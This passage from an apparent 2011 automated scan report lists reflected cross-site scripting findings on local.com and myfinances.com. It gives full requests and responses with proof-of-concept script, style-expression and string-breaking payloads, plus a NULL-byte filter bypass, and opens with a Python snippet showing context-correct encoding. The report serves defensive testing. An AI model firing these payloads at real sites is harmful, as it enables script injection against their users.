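    return re.sub(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal_body)


def attr_encode(value: str) -> str:
    """Encode a value for a double-quoted HTML attribute value."""
    return html.escape(value, quote=True)


def render_vulnerable(cid: str) -> str:
    """Both sinks with the value concatenated raw, as the report observed."""
    return (f'<a href="/results.aspx?cid={cid}">results</a>\n'   # assumed attribute sink
            f'<script>s.campaign = "{cid}";</script>')           # literal from finding 1.475


def render_hardened(cid: str) -> str:
    """Same template, each sink encoded for its own context."""
    return (f'<a href="/results.aspx?cid={attr_encode(cid)}">results</a>\n'
            f'<script>s.campaign = "{js_string_encode(cid)}";</script>')


# Values as the server sees them after its URL-decode (findings 1.475 and 1.476).
CID_TERMINATOR = '506d27c6";652d94a4b4b'
CID_EXPRESSION = '506c80ba"style="x:expression(alert(1))"45503434253'

if __name__ == "__main__":
    print(render_vulnerable(CID_TERMINATOR))
    print(render_hardened(CID_TERMINATOR))
    print(render_hardened(CID_EXPRESSION))
```

Note that attribute encoding alone would not protect the script literal (`&quot;` is just six ordinary characters inside JavaScript), and JavaScript encoding alone would not protect the attribute; the encoder must match the sink.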

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 131999
Date: Thu, 03 Feb 2011 15:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=0tqwfcmc1mz4bv45earm1z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506d27c6";652d94a4b4b&loc=Dallas%2c+TX&kw=banks&uid=a555a31b-b16a-44e4-835f-482623ce13b9&expdate=634349085792409448&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506d27c6%22%253b652d94a4b4b%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:19 GMT; path=/
Set-Cookie: localcom_s=cid=506d27c6";652d94a4b4b&exp=634323183792409448; domain=local.com; expires=Thu, 03-Feb-2011 16:26:19 GMT; path=/
Content-Length: 131999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
prop1="banks";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Businesses - SERP - SEM";
s.prop8="";
s.campaign = "506d27c6";652d94a4b4b";
s.eVar1="v3:Businesses - SERP - SEM";
s.eVar5="v3:Businesses - SERP - SEM";
s.eVar6="Retail Banks";
s.eVar11="506d27c6";652d94a4b4
...[SNIP]...

1.476. http://www.local.com/results.aspx [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 133517
Date: Thu, 03 Feb 2011 15:56:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; path=/; HttpOnly
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; domain=local.com; expires=Thu, 03-Feb-2011 16:26:17 GMT; path=/
Content-Length: 133517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506c80ba"style="x:expression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.477. http://www.local.com/results.aspx [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131540
Date: Thu, 03 Feb 2011 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:36 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323183968705455; domain=local.com; expires=Thu, 03-Feb-2011 16:26:36 GMT; path=/
Content-Length: 131540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style="x:expression(alert(1))"fccc9411126&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.478. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130504
Date: Thu, 03 Feb 2011 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=bzp0h255qcweve45j0rd4z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=639a705c-136b-485f-8a3e-16b57e26ba7b&expdate=634349086150332423&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js%269a378%22style%253d%22x%253aexpression(alert(1))%22043ffc8a60a%3d1&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:55 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323184150332423; domain=local.com; expires=Thu, 03-Feb-2011 16:26:55 GMT; path=/
Content-Length: 130504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style="x:expression(alert(1))"043ffc8a60a=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

1.479. http://www.local.com/topics/ [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 33965
Date: Thu, 03 Feb 2011 16:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:21 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=foodb0f6f%22%3bb0022a17af6; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 33965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
<script type="text/javascript">
s.pageName="Topics - Landing - Food";
s.prop1="foodb0f6f";b0022a17af6";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Topics - Landing - Food";
s.prop8="Organic";
s.campaign = "506c80ba
...[SNIP]...

1.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

1.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

1.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/?af164"><script>alert(1)</script>bfea6dcd612=1" />
...[SNIP]...

1.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1&page=1'>
...[SNIP]...

1.484. http://www.myfinances.com/blog.html [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
